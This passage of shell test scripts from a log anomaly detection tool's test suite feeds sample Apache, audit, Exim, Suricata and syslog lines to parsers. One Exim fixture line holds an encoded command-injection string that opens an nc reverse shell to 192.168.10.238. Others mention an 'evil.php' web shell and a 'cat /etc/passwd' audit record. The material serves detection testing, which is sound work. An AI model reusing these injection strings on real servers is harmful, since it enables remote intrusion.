./demo/aminerXmlInputDemo/aminerXmlInputDemo.sh > /tmp/out.txt exit_code=$? OUTPUT=$(cat /tmp/out.txt) read -r -d '' VAR << END New path(s) detected NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines) /model: {'messages': [{'note': {'+id': '501', 'to': 'Tove', 'from': 'Jani', 'heading': None, 'body': {'text1': "Don't forget me this weekend!", 'text2': "Don't forget me this weekend!"}}}, {'note': {'+id': '502', '+opt': 'text', 'to': 'Jani', 'from': 'Tove', 'heading': 'Re: ', 'body': {'text1': 'I will not', 'text2': 'I will not'}}}]} /model/messages/note/+id/id: 501 /model/messages/note/to/to: Tove /model/messages/note/from/from: Jani /model/messages/note/?heading: null /model/messages/note/body/text1/text1: Don't forget me this weekend! /model/messages/note/body/text2/text2: Don't forget me this weekend! /model/messages/note/+id/id: 502 /model/messages/note/_+opt/opt: text /model/messages/note/to/to: Jani /model/messages/note/from/from: Tove /model/messages/note/?heading/heading: Re: /model/messages/note/body/text1/text1: I will not /model/messages/note/body/text2/text2: I will not ['/model', '/model/messages/note/+id/id', '/model/messages/note/to/to', '/model/messages/note/from/from', '/model/messages/note/body/text1/text1', '/model/messages/note/body/text2/text2', '/model/messages/note/+id/id/0', '/model/messages/note/to/to/0', '/model/messages/note/from/from/0', '/model/messages/note/?heading', '/model/messages/note/body/text1/text1/0', '/model/messages/note/body/text2/text2/0', '/model/messages/note/+id/id/1', '/model/messages/note/_+opt/opt', '/model/messages/note/to/to/1', '/model/messages/note/from/from/1', '/model/messages/note/?heading/heading', '/model/messages/note/body/text1/text1/1', '/model/messages/note/body/text2/text2/1'] Original log line: Tove Jani Don't forget me this weekend! Don't forget me this weekend! Jani Tove Re: I will not I will not END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo echo "$OUTPUT" exit_code=1 fi sudo rm /tmp/xml-input-demo-config.yml 2> /dev/null sudo rm /tmp/syslog sudo rm /tmp/out.txt exit $exit_code logdata-anomaly-miner-2.8.0/aecid-testsuite/runBandit.sh000077500000000000000000000001571500476301700232710ustar00rootroot00000000000000#!/bin/bash bandit -r /usr/lib/logdata-anomaly-miner --ini /home/aminer/logdata-anomaly-miner/.bandit exit $? logdata-anomaly-miner-2.8.0/aecid-testsuite/runConfAvailableTest.sh000077500000000000000000002612321500476301700254210ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh sudo mkdir /tmp/lib 2> /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo chown -R $USER:$USER /tmp/lib/aminer 2> /dev/null sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo mkdir /tmp/lib/aminer/log 2> /dev/null sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null sudo rm /tmp/syslog 2> /dev/null exit_code=0 CONFIG_PATH=/tmp/config.yml OUT=/tmp/output.txt LOGFILE=/tmp/log.txt #PATH_AIT_LDS=../source/root/etc/aminer/conf-available/ait-lds/*.py PATH_AIT_LDS=/etc/aminer/conf-available/ait-lds/*.py #PATH_AIT_LDS2=../source/root/etc/aminer/conf-available/ait-lds2/*.py PATH_AIT_LDS2=/etc/aminer/conf-available/ait-lds2/*.py #PATH_GENERIC=../source/root/etc/aminer/conf-available/generic/*.py PATH_GENERIC=/etc/aminer/conf-available/generic/*.py cntr=0 files=() for filename in $PATH_AIT_LDS; do files[$cntr]=$filename let cntr=cntr+1 done for filename in $PATH_AIT_LDS2; do files[$cntr]=$filename let cntr=cntr+1 done for filename in $PATH_GENERIC; do files[$cntr]=$filename let cntr=cntr+1 done for filename in ${files[@]}; do cat > $CONFIG_PATH < $LOGFILE echo '::1 - - [17/May/2015:10:05:03 +0000] "-" 200 203023' >> $LOGFILE echo '192.168.10.190 - - [29/Feb/2020:13:58:32 +0000] "GET /services/portal/ HTTP/1.1" 200 7499 "-" "-"' >> $LOGFILE ;; ApacheErrorParsingModel) echo '[Sun Mar 01 06:28:15.983231 2020] [:error] [pid 32548] [client 192.168.10.4:55308] PHP Warning: Declaration of Horde_Form_Type_pgp::init($gpg, $temp_dir = NULL, $rows = NULL, $cols = NULL) should be compatible with Horde_Form_Type_longtext::init($rows = 8, $cols = 80, $helper = Array) in /usr/share/php/Horde/Form/Type.php on line 878, referer: http://mail.cup.com/nag/' > $LOGFILE echo "[Sun Mar 01 06:28:15.983231 2020] [:error] [pid 32548] [client 192.168.10.4:55308] PHP Warning: system(): Cannot execute a blank command in words.php on line 12" > $LOGFILE echo "[Wed Mar 04 19:32:45.144442 2020] [:error] [pid 8738] [client 192.168.10.238:60488] PHP Notice: Undefined index: cmd in /var/www/mail.cup.com/static/evil.php on line 1" >> $LOGFILE echo "[Wed Mar 04 06:26:43.756548 2020] [:error] [pid 22069] [client 192.168.10.190:33604] PHP Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Horde_Form_Variable has a deprecated constructor in /usr/share/php/Horde/Form/Variable.php on line 24, referer: http://mail.cup.com/nag/" >> $LOGFILE ;; AuditdParsingModel) echo 'type=EXECVE msg=audit(1582934957.620:917519): argc=10 a0="find" a1="/usr/lib/php" a2="-mindepth" a3="1" a4="-maxdepth" a5="1" a6="-regex" a7=".*[0-9]\.[0-9]" a8="-printf" a9="%f\n"' > $LOGFILE echo 'type=PROCTITLE msg=audit(1582934957.616:917512): proctitle=736F7274002D726E' >> $LOGFILE echo 'type=SYSCALL msg=audit(1582934957.616:917513): arch=c000003e syscall=2 success=yes exit=3 a0=7f5b904e4988 a1=80000 a2=1 a3=7f5b906ec518 items=1 ppid=25680 pid=25684 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sort" exe="/usr/bin/sort" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1582934957.616:917512): item=0 name="/usr/bin/sort" inode=2883 dev=fe:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=LOGIN msg=audit(1582935421.373:947570): pid=25821 uid=0 old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=22 res=1' >> $LOGFILE echo "type=SOCKADDR msg=audit(1582935421.377:947594): saddr=01002F6465762F6C6F6700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" >> $LOGFILE echo "type=UNKNOWN[1327] msg=audit(1522927552.749:917): proctitle=636174002F6574632F706173737764" >> $LOGFILE echo 'type=CRED_REFR msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=USER_START msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=USER_ACCT msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=USER_AUTH msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=CRED_DISP msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=SERVICE_START msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=SERVICE_STOP msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=USER_END msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=USER_CMD msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=CRED_ACQ msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=BPRM_FCAPS msg=audit(1583242318.512:13886958): fver=17474 fp=33 fi=4294967295 fe=4294967295 old_pp=message old_pi="apache2" old_pe="/usr/bin/bash" new_pp=(null) new_pi=(null) new_pe=(null)' >> $LOGFILE ;; EximParsingModel) echo "2020-02-29 00:04:25 Start queue run: pid=31912" > $LOGFILE echo "2020-02-29 00:34:25 End queue run: pid=32425" >> $LOGFILE echo "2020-03-04 19:17:34 no host name found for IP address 192.168.10.238" >> $LOGFILE echo "2020-03-04 19:21:48 VRFY failed for boyce@cup.com H=(x) [192.168.10.238]" >> $LOGFILE echo "2020-03-04 19:25:08 1j9Zdk-00029d-Bi <= trula@mail.cup.com U=www-data P=local S=8714 id=20200304192508.Horde.g3OQpszuommgdrQpHrx6wIc@mail.cup.com" >> $LOGFILE echo "2020-03-04 19:25:08 1j9Zdk-00029d-Bi => irwin R=local_user T=mail_spool" >> $LOGFILE echo '2020-03-04 19:36:19 1j9ZoZ-0002Jk-9W ** ${run{\x2fbin\x2fsh\t-c\t\x22nc\t-e\t\x2fbin\x2fsh\t192.168.10.238\t9963\x22}}@localhost: Too many "Received" headers - suspected mail loop' >> $LOGFILE echo "2020-03-04 19:36:57 1j9ZpB-0002KN-QF Completed" >> $LOGFILE echo "2020-03-04 20:04:25 1j9ZoZ-0002Jk-9W Message is frozen" >> $LOGFILE echo "2020-03-04 19:38:19 1j9ZoZ-0002Jk-9W Frozen (delivery error message)" >> $LOGFILE ;; SuricataEventParsingModel) echo '{"timestamp":"2020-02-29T00:00:12.734324+0000","flow_id":914989792375924,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.154","src_port":53985,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":30266,"rrname":"190.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}}' > $LOGFILE echo '{"timestamp":"2020-02-29T00:00:14.000538+0000","flow_id":1357371404246463,"event_type":"flow","src_ip":"192.168.10.154","src_port":46289,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:12.974271+0000","end":"2020-02-28T23:55:13.085657+0000","age":1,"state":"established","reason":"timeout","alerted":false}}' >> $LOGFILE echo '{"timestamp":"2020-02-29T00:00:14.886252+0000","flow_id":149665274984610,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.190","src_port":39438,"dest_ip":"192.168.10.154","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.cup.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.cup.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7326}}' >> $LOGFILE echo '{"timestamp":"2020-02-29T00:00:14.977952+0000","flow_id":149665274984610,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.154","src_port":80,"dest_ip":"192.168.10.190","dest_port":39438,"proto":"TCP","http":{"hostname":"mail.cup.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.cup.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7326},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":41080,"tx_id":1}}' >> $LOGFILE echo '{"timestamp":"2020-02-29T00:00:18.000491+0000","event_type":"stats","stats":{"uptime":17705,"capture":{"kernel_packets":337720,"kernel_drops":0},"decoder":{"pkts":337749,"bytes":229373623,"invalid":3062,"ipv4":335528,"ipv6":10,"ethernet":337749,"raw":0,"null":0,"sll":0,"tcp":317611,"udp":14805,"sctp":0,"icmpv4":50,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":679,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7104256},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":7155,"ssn_memcap_drop":0,"pseudo":1082,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":7418,"synack":7307,"rst":3226,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":375,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":58},"app_layer":{"flow":{"http":4883,"ftp":0,"smtp":0,"tls":1564,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":258,"dcerpc_udp":0,"dns_udp":6951,"failed_udp":119},"tx":{"http":13248,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":7185}},"flow_mgr":{"closed_pruned":7112,"new_pruned":21,"est_pruned":6999,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":24462,"memcap_state":0,"memcap_global":0},"http":{"memuse":61601,"memcap":0}}}' >> $LOGFILE echo '{"timestamp":"2020-02-29T00:01:53.976648+0000","flow_id":378741657290945,"in_iface":"eth0","event_type":"tls","src_ip":"192.168.10.238","src_port":53156,"dest_ip":"192.168.10.154","dest_port":443,"proto":"TCP","tls":{"subject":"CN=mail.cup.com","issuerdn":"CN=ChangeMe","fingerprint":"12:7a:88:ea:52:10:62:44:f0:c5:33:8a:28:2d:ad:12:a1:4e:7e:18","sni":"mail.cup.com","version":"TLS 1.2","notbefore":"2020-02-28T18:40:23","notafter":"2030-02-25T18:40:23"}}' >> $LOGFILE echo '{"timestamp":"2020-02-29T06:11:02.147044+0000","flow_id":415686269975930,"in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":50850,"dest_ip":"192.168.10.154","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2012887,"rev":3,"signature":"ET POLICY Http Client Body contains pass= in cleartext","category":"Potential Corporate Privacy Violation","severity":1},"http":{"hostname":"mail.cup.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.cup.com\/login.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"\/services\/portal\/","length":20}}' >> $LOGFILE ;; SuricataFastParsingModel) echo "02/29/2020-00:00:13.674931 [**] [1:2012887:3] ET POLICY Http Client Body contains pass= in cleartext [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 192.168.10.190:39438 -> 192.168.10.154:80" > $LOGFILE ;; SyslogParsingModel) echo "Feb 28 00:01:41 mail-0 dovecot: imap(kelsey): Logged out in=79 out=875" > $LOGFILE echo "Mar 1 06:25:38 mail dovecot: imap(lino): Error: Failed to autocreate mailbox INBOX: Internal error occurred. Refer to server log for more information. [2020-03-01 06:25:38]" >> $LOGFILE echo "Feb 28 00:01:44 mail-0 dovecot: imap(della): Error: file_dotlock_create(/var/mail/della) failed: Permission denied (euid=1013(della) egid=1013(della) missing +w perm: /var/mail, we're not in group 8(mail), dir owned by 0:8 mode=0775) (set mail_privileged_group=mail)" >> $LOGFILE echo "Mar 1 06:25:41 mail dovecot: imap(idella): Error: Failed to autocreate mailbox INBOX: Internal error occurred. Refer to server log for more information. [2020-03-01 06:25:41]" >> $LOGFILE echo "Mar 4 14:14:36 mail dovecot: imap-login: Disconnected (auth failed, 2 attempts in 12 secs): user=, method=PLAIN, rip=127.0.0.1, lip=127.0.0.1, secured, session=" >> $LOGFILE echo "Mar 4 18:43:05 mail dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.185, lip=192.168.10.177, session=" >> $LOGFILE echo "Mar 4 13:51:48 mail dovecot: imap-login: Disconnected (disconnected before auth was ready, waited 0 secs): user=<>, rip=192.168.10.18, lip=192.168.10.21, session=<+KO9uAeg4sPAqAoS>" >> $LOGFILE echo "Mar 4 18:43:59 mail dovecot: imap-login: Login: user=, method=PLAIN, rip=127.0.0.1, lip=127.0.0.1, mpid=11475, secured, session=<8ZitzQugnrh/AAAB>" >> $LOGFILE echo "Feb 28 11:39:45 mail-0 dovecot: imap-login: Error: anvil: Anvil queries timed out after 5 secs - aborting queries" >> $LOGFILE echo "Feb 28 09:15:59 mail-1 dovecot: imap-login: Warning: Auth process not responding, delayed sending initial response (greeting): user=<>, rip=127.0.0.1, lip=127.0.0.1, secured, session=" >> $LOGFILE echo "Feb 28 11:39:35 mail-2 dovecot: auth: Error: auth worker: Aborted PASSV request for marjory: Worker process died unexpectedly" >> $LOGFILE echo "Feb 28 11:39:35 mail-2 dovecot: auth-worker(2233): Fatal: Error reading configuration: Timeout reading config from /var/run/dovecot/config" >> $LOGFILE echo "Feb 28 11:39:35 mail-2 dovecot: master: Error: service(auth-worker): command startup failed, throttling for 2 secs" >> $LOGFILE echo 'Feb 28 11:39:46 mail-2 HORDE: [imp] Login success for marjory (192.168.10.18) to {imap://localhost/} [pid 1764 on line 156 of "/var/www/mail.insect.com/imp/lib/Auth.php"]' >> $LOGFILE echo 'Feb 28 17:18:23 mail-2 HORDE: [imp] Message sent to marcelle@mail.insect.com, merlene@mail.insect.com from les (192.168.10.18) [pid 9596 on line 970 of "/var/www/mail.insect.com/imp/lib/Compose.php"]' >> $LOGFILE echo 'Feb 28 20:01:48 mail-2 HORDE: [imp] FAILED LOGIN for violet (192.168.10.18) to {imap://localhost/} [pid 14794 on line 156 of "/var/www/mail.insect.com/imp/lib/Auth.php"]' >> $LOGFILE echo 'Mar 1 06:25:38 mail HORDE: [imp] [status] Could not open mailbox "INBOX". [pid 999 on line 730 of "/var/www/mail.onion.com/imp/lib/Imap.php"]' >> $LOGFILE echo 'Mar 1 06:27:56 mail HORDE: [imp] [getSyncToken] IMAP error reported by server. [pid 1127 on line 730 of "/var/www/mail.onion.com/imp/lib/Imap.php"]' >> $LOGFILE echo 'Feb 28 12:12:54 mail-2 HORDE: [horde] Login success for dorie to horde (192.168.10.18) [pid 2272 on line 163 of "/var/www/mail.insect.com/login.php"]' >> $LOGFILE echo 'Feb 28 12:13:00 mail-2 HORDE: [horde] User marjory logged out of Horde (192.168.10.18) [pid 2988 on line 106 of "/var/www/mail.insect.com/login.php"]' >> $LOGFILE echo 'Feb 28 17:07:07 mail-2 HORDE: [horde] FAILED LOGIN for marcelle to horde (192.168.10.98) [pid 8517 on line 198 of "/var/www/mail.insect.com/login.php"]' >> $LOGFILE echo 'Mar 1 18:22:40 mail HORDE: [imp] [login] Authentication failed. [pid 12890 on line 730 of "/var/www/mail.onion.com/imp/lib/Imap.php"]' >> $LOGFILE echo 'Mar 4 18:55:05 mail HORDE: [turba] PHP ERROR: finfo_file(): Empty filename or path [pid 11642 on line 166 of "/usr/share/php/Horde/Mime/Magic.php"]' >> $LOGFILE echo 'Mar 4 18:50:51 mail HORDE: [horde] PHP ERROR: Cannot modify header information - headers already sent [pid 11019 on line 0 of "Unknown"]' >> $LOGFILE echo 'Mar 4 18:01:23 mail HORDE: Guest user is not authorized for Horde (Host: 192.168.10.81). [pid 4815 on line 324 of "/usr/share/php/Horde/Registry.php"]' >> $LOGFILE echo 'Mar 4 18:10:08 mail HORDE: PHP ERROR: rawurlencode() expects parameter 1 to be string, array given [pid 6556 on line 302 of "/usr/share/php/Horde/Url.php"]' >> $LOGFILE # missing model/service/horde/horde/free_msg - no log found! echo "Feb 28 12:39:02 mail-0 CRON[11260]: (root) CMD ( [ -x /usr/lib/php/sessionclean ] && if [ ! -d /run/systemd/system ]; then /usr/lib/php/sessionclean; fi)" >> $LOGFILE echo "Feb 28 06:25:01 mail-1 CRON[27486]: pam_unix(cron:session): session opened for user root by (uid=0)" >> $LOGFILE echo "Feb 28 15:42:36 mail-1 auth: pam_unix(dovecot:auth): authentication failure; logname= uid=0 euid=0 tty=dovecot ruser=marcelino rhost=127.0.0.1 user=marcelino" >> $LOGFILE echo "Mar 1 03:09:18 mail-0 systemd[1]: Starting Clean php session files..." >> $LOGFILE echo "Mar 1 03:09:19 mail-0 systemd[1]: Started Clean php session files." >> $LOGFILE echo "Mar 1 18:26:18 mail systemd[1]: Starting Cleanup of Temporary Directories..." >> $LOGFILE echo "Mar 1 18:26:18 mail systemd[1]: Started Cleanup of Temporary Directories." >> $LOGFILE echo "Mar 2 06:37:52 mail systemd[1]: Starting Daily apt upgrade and clean activities..." >> $LOGFILE echo "Mar 2 06:37:53 mail systemd[1]: Started Daily apt upgrade and clean activities." >> $LOGFILE echo "Mar 2 12:30:18 mail systemd[1]: Starting Daily apt download activities..." >> $LOGFILE echo "Mar 2 12:30:19 mail systemd[1]: Started Daily apt download activities." >> $LOGFILE echo "Mar 3 06:29:00 mail systemd[1]: Starting Security Auditing Service..." >> $LOGFILE echo "Mar 3 06:29:00 mail systemd[1]: Started Security Auditing Service." >> $LOGFILE echo "Mar 4 06:29:05 mail systemd[1]: Stopping Security Auditing Service..." >> $LOGFILE echo "Mar 4 06:29:05 mail systemd[1]: Stopped Security Auditing Service." >> $LOGFILE echo "Mar 5 06:25:35 mail systemd[1]: Reloading The Apache HTTP Server." >> $LOGFILE echo "Mar 5 06:25:35 mail systemd[1]: Reloaded The Apache HTTP Server." >> $LOGFILE echo "Feb 28 11:52:32 mail-2 systemd[1]: Mounting Arbitrary Executable File Formats File System..." >> $LOGFILE echo "Feb 27 11:52:32 mail-2 systemd[1]: Mounted Arbitrary Executable File Formats File System." >> $LOGFILE echo "Feb 28 13:56:59 mail-2 systemd[1]: apt-daily.timer: Adding 6h 4min 46.743459s random time." >> $LOGFILE # missing model/service/systemd/service - no log found! echo "Feb 28 07:24:02 mail-0 kernel: [47678.309129] [] ? ret_from_fork+0x57/0x70" >> $LOGFILE echo "Mar 5 06:29:07 mail augenrules[17378]: backlog_wait_time 0" >> $LOGFILE echo "Mar 5 06:29:07 mail auditd[17377]: dispatch error reporting limit reached - ending report notification." >> $LOGFILE echo "Mar 5 06:29:07 mail auditd: audit log is not writable by owner" >> $LOGFILE echo "Mar 4 06:29:05 mail audispd: No plugins found, exiting" >> $LOGFILE echo 'Mar 3 06:29:01 mail liblogging-stdlog: [origin software="rsyslogd" swVersion="8.24.0" x-pid="480" x-info="http://www.rsyslog.com"] rsyslogd was HUPed' >> $LOGFILE echo "Mar 1 09:25:16 mail freshclam[22090]: Sun Mar 1 09:25:16 2020 -> bytecode.cvd is up to date (version: 331, sigs: 94, f-level: 63, builder: anvilleg)" >> $LOGFILE echo "Mar 1 07:26:09 mail dhclient[418]: DHCPREQUEST of 192.168.10.21 on eth0 to 192.168.10.2 port 67" >> $LOGFILE echo "Mar 1 00:59:38 mail-2 dhclient[387]: DHCPACK of 192.168.10.21 from 192.168.10.2" >> $LOGFILE echo "Feb 28 21:12:42 mail-2 dhclient[418]: bound to 192.168.10.21 -- renewal in 36807 seconds." >> $LOGFILE ;; SyslogParsingModelAIT-LDSv1) echo "Feb 29 00:01:41 mail-0 dovecot: imap(kelsey): Logged out in=79 out=875" > $LOGFILE echo "Mar 1 06:25:38 mail dovecot: imap(lino): Error: Failed to autocreate mailbox INBOX: Internal error occurred. Refer to server log for more information. [2020-03-01 06:25:38]" >> $LOGFILE echo "Feb 29 00:01:44 mail-0 dovecot: imap(della): Error: file_dotlock_create(/var/mail/della) failed: Permission denied (euid=1013(della) egid=1013(della) missing +w perm: /var/mail, we're not in group 8(mail), dir owned by 0:8 mode=0775) (set mail_privileged_group=mail)" >> $LOGFILE echo "Mar 1 06:25:41 mail dovecot: imap(idella): Error: Failed to autocreate mailbox INBOX: Internal error occurred. Refer to server log for more information. [2020-03-01 06:25:41]" >> $LOGFILE echo "Mar 4 14:14:36 mail dovecot: imap-login: Disconnected (auth failed, 2 attempts in 12 secs): user=, method=PLAIN, rip=127.0.0.1, lip=127.0.0.1, secured, session=" >> $LOGFILE echo "Mar 4 18:43:05 mail dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.185, lip=192.168.10.177, session=" >> $LOGFILE echo "Mar 4 13:51:48 mail dovecot: imap-login: Disconnected (disconnected before auth was ready, waited 0 secs): user=<>, rip=192.168.10.18, lip=192.168.10.21, session=<+KO9uAeg4sPAqAoS>" >> $LOGFILE echo "Mar 4 18:43:59 mail dovecot: imap-login: Login: user=, method=PLAIN, rip=127.0.0.1, lip=127.0.0.1, mpid=11475, secured, session=<8ZitzQugnrh/AAAB>" >> $LOGFILE echo "Feb 29 11:39:45 mail-0 dovecot: imap-login: Error: anvil: Anvil queries timed out after 5 secs - aborting queries" >> $LOGFILE echo "Feb 29 09:15:59 mail-1 dovecot: imap-login: Warning: Auth process not responding, delayed sending initial response (greeting): user=<>, rip=127.0.0.1, lip=127.0.0.1, secured, session=" >> $LOGFILE echo "Feb 29 11:39:35 mail-2 dovecot: auth: Error: auth worker: Aborted PASSV request for marjory: Worker process died unexpectedly" >> $LOGFILE echo "Feb 29 11:39:35 mail-2 dovecot: auth-worker(2233): Fatal: Error reading configuration: Timeout reading config from /var/run/dovecot/config" >> $LOGFILE echo "Feb 29 11:39:35 mail-2 dovecot: master: Error: service(auth-worker): command startup failed, throttling for 2 secs" >> $LOGFILE echo 'Feb 29 11:39:46 mail-2 HORDE: [imp] Login success for marjory (192.168.10.18) to {imap://localhost/} [pid 1764 on line 156 of "/var/www/mail.insect.com/imp/lib/Auth.php"]' >> $LOGFILE echo 'Feb 29 17:18:23 mail-2 HORDE: [imp] Message sent to marcelle@mail.insect.com, merlene@mail.insect.com from les (192.168.10.18) [pid 9596 on line 970 of "/var/www/mail.insect.com/imp/lib/Compose.php"]' >> $LOGFILE echo 'Feb 29 20:01:48 mail-2 HORDE: [imp] FAILED LOGIN for violet (192.168.10.18) to {imap://localhost/} [pid 14794 on line 156 of "/var/www/mail.insect.com/imp/lib/Auth.php"]' >> $LOGFILE echo 'Mar 1 06:25:38 mail HORDE: [imp] [status] Could not open mailbox "INBOX". [pid 999 on line 730 of "/var/www/mail.onion.com/imp/lib/Imap.php"]' >> $LOGFILE echo 'Mar 1 06:27:56 mail HORDE: [imp] [getSyncToken] IMAP error reported by server. [pid 1127 on line 730 of "/var/www/mail.onion.com/imp/lib/Imap.php"]' >> $LOGFILE echo 'Feb 29 12:12:54 mail-2 HORDE: [horde] Login success for dorie to horde (192.168.10.18) [pid 2272 on line 163 of "/var/www/mail.insect.com/login.php"]' >> $LOGFILE echo 'Feb 29 12:13:00 mail-2 HORDE: [horde] User marjory logged out of Horde (192.168.10.18) [pid 2988 on line 106 of "/var/www/mail.insect.com/login.php"]' >> $LOGFILE echo 'Feb 29 17:07:07 mail-2 HORDE: [horde] FAILED LOGIN for marcelle to horde (192.168.10.98) [pid 8517 on line 198 of "/var/www/mail.insect.com/login.php"]' >> $LOGFILE echo 'Mar 1 18:22:40 mail HORDE: [imp] [login] Authentication failed. [pid 12890 on line 730 of "/var/www/mail.onion.com/imp/lib/Imap.php"]' >> $LOGFILE echo 'Mar 4 18:55:05 mail HORDE: [turba] PHP ERROR: finfo_file(): Empty filename or path [pid 11642 on line 166 of "/usr/share/php/Horde/Mime/Magic.php"]' >> $LOGFILE echo 'Mar 4 18:50:51 mail HORDE: [horde] PHP ERROR: Cannot modify header information - headers already sent [pid 11019 on line 0 of "Unknown"]' >> $LOGFILE echo 'Mar 4 18:01:23 mail HORDE: Guest user is not authorized for Horde (Host: 192.168.10.81). [pid 4815 on line 324 of "/usr/share/php/Horde/Registry.php"]' >> $LOGFILE echo 'Mar 4 18:10:08 mail HORDE: PHP ERROR: rawurlencode() expects parameter 1 to be string, array given [pid 6556 on line 302 of "/usr/share/php/Horde/Url.php"]' >> $LOGFILE # missing model/service/horde/horde/free_msg - no log found! echo "Feb 29 12:39:02 mail-0 CRON[11260]: (root) CMD ( [ -x /usr/lib/php/sessionclean ] && if [ ! -d /run/systemd/system ]; then /usr/lib/php/sessionclean; fi)" >> $LOGFILE echo "Feb 29 06:25:01 mail-1 CRON[27486]: pam_unix(cron:session): session opened for user root by (uid=0)" >> $LOGFILE echo "Feb 29 15:42:36 mail-1 auth: pam_unix(dovecot:auth): authentication failure; logname= uid=0 euid=0 tty=dovecot ruser=marcelino rhost=127.0.0.1 user=marcelino" >> $LOGFILE echo "Mar 1 03:09:18 mail-0 systemd[1]: Starting Clean php session files..." >> $LOGFILE echo "Mar 1 03:09:19 mail-0 systemd[1]: Started Clean php session files." >> $LOGFILE echo "Mar 1 18:26:18 mail systemd[1]: Starting Cleanup of Temporary Directories..." >> $LOGFILE echo "Mar 1 18:26:18 mail systemd[1]: Started Cleanup of Temporary Directories." >> 